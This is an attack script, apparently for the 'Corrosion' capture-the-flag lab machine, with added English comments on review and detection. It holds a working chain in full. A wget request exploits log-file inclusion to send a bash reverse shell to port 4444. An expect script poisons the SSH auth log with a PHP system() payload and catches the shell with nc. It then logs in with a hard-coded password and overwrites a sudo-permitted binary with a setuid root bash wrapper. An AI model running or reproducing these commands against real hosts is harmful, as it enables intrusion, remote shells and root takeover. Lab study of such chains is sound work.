Corrosion 攻击脚本

攻击脚本:
1. 攻击过程中,脚本会等待下面的链接被访问:
# Single HTTP request to randylogs.php on the lab host 192.168.253.131.
#   file=  names /var/log/auth.log, i.e. the page is asked to read the SSH auth log.
#   cmd=   is a URL-encoded bash command that opens an interactive shell back to
#          192.168.253.132 on TCP port 4444 (the port the expect script listens on).
# -q silences wget and -O /dev/null discards the response body.
# NOTE(review): this only has an effect if randylogs.php includes the named file as
# PHP and the web server account can read auth.log — the PHP source is not shown here.
# Defender view: a file= parameter pointing under /var/log, or a cmd= parameter
# carrying shell syntax, is visible in the web access log and worth alerting on;
# restricting file= to an allow-list and denying the web user read access to
# auth.log removes the path.
wget -q -O /dev/null "http://192.168.253.131/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=%2fbin%2fbash+-c+%22bash+-i+%3e%26+%2fdev%2ftcp%2f192.168.253.132%2f4444+0%3e%261%22"
2.攻击脚本
#!/usr/bin/expect
# Expect script that drives three interactive sessions against the lab host
# 192.168.253.131, in this order:
#   1. an SSH login attempt whose user name is a PHP snippet and whose password is
#      a placeholder, so the login is expected to fail;
#   2. an nc listener on port 4444 that waits for an inbound shell and sends two
#      commands to it;
#   3. an SSH login as randy that overwrites easysysinfo with a small setuid/setgid
#      wrapper and runs it through sudo.
# NOTE(review): stage 1 presumably relies on sshd writing the rejected user name to
# /var/log/auth.log, the file named in the page's step 1 request — confirm.
# Defender view: auth-log entries whose user name contains "<?php", and a sudo rule
# that points at a binary inside a directory the user can write to, are the two
# conditions this script depends on; both are detectable and fixable on the host.

# Timeout in seconds applied to every expect call below.
set timeout 40

# wait_command: pause two seconds, then consume output up to a CRLF.
# Takes no arguments and returns nothing; the puts that would echo the matched
# text is left commented out, so the output is read and dropped.
proc wait_command {} {
    # Wait 2 seconds
    sleep 2
    # Receive the command output (printing is disabled below)
    expect {
        -re "(.*)\r\n" {
            # puts "命令输出:$expect_out(0,string)"
        }
    }
}

# SSH user name, host and password for the first connection.
# The user name is a quoted PHP snippet; the password is a placeholder value.
set username "\'<?php system(\$_REQUEST\[\'cmd\'\]);?>\'"
set hostname "192.168.253.131"
set password "your_password"

# Start the SSH connection
spawn ssh $username@$hostname
expect "assword:"
send "$password\r"
# Matches the client's "please try again" message, i.e. the login was rejected.
expect "lease try again"
wait_command
# Ctrl+C
send "\x03"
# Wait for the ssh process to exit
expect eof

# Start the nc listener on port 4444
spawn nc -lvnp 4444
expect "listening on"
expect {
    "connect" {
        # When nc reports an incoming connection, print a status message
        puts "nc连接成功,发送命令..."
        # Send a command to the reverse shell on the server side
        send "whoami\n"
    }
    timeout {
        # Timeout handling: no connection arrived within the 40-second timeout
        send_user "超时,未成功建立nc连接。\n"
        exit 1
    }
}
# Receive the command output
wait_command
# Reads passwd.txt from the shell's current directory; its content is not shown here.
send "cat passwd.txt\n"
# Receive the command output
wait_command
send "\x03"
# Wait for the nc process to exit
expect eof

# SSH user name, host and password for the second connection.
# NOTE(review): these credentials are hard-coded; where they were obtained is not
# shown in this script.
set username "randy"
set hostname "192.168.253.131"
set password "randylovesgoldfish1998"

# Start the SSH connection
spawn ssh $username@$hostname
expect "assword:"
send "$password\r"
wait_command
# List the sudo rules for this user; sudo asks for the password again.
send "sudo -l\n"
expect "assword"
send "$password\r"
sleep 3

# /home/randy/tools/easysysinfo was found to be runnable (original author's note
# after the sudo -l step); build the privilege-escalation program in its place.
# NOTE(review): this works only if the sudo rule names this exact path and randy
# can overwrite the file — the sudoers content is not shown. Keeping sudo targets
# in root-owned, non-writable locations closes this.
send "cd /home/randy/tools/\n"
# C source sent to the host: sets uid and gid to 0, then starts an interactive bash.
set file_content {
#include <unistd.h>
#include <stdlib.h>
int main(){
    setuid(0);
    setgid(0);
    system("bash -i");
    return 0;
}
}
set file_path "/home/randy/tools/easysysinfo.c"

# Create the file and write the content
send "echo '$file_content' > $file_path\r"
# Compile over the existing easysysinfo name and restrict it to the owner.
send "gcc easysysinfo.c -o easysysinfo\n"
expect -re "(.*)\r\n"
send "chmod 700 easysysinfo\n"
expect -re "(.*)\r\n"

# Run it with elevated privileges
send "sudo ./easysysinfo\n"
expect -re "(.*)\r\n"
# Creates an empty file named backdoor.sh and lists the directory; presumably a
# visible marker that the elevated shell accepted commands — confirm.
send "touch backdoor.sh\n"
expect -re "(.*)\r\n"
send "ls -l\n"
expect -re "(.*)\r\n"

# Close the connection: exit is sent twice, then wait for ssh to end.
send "exit\n"
send "exit\n"
expect eof
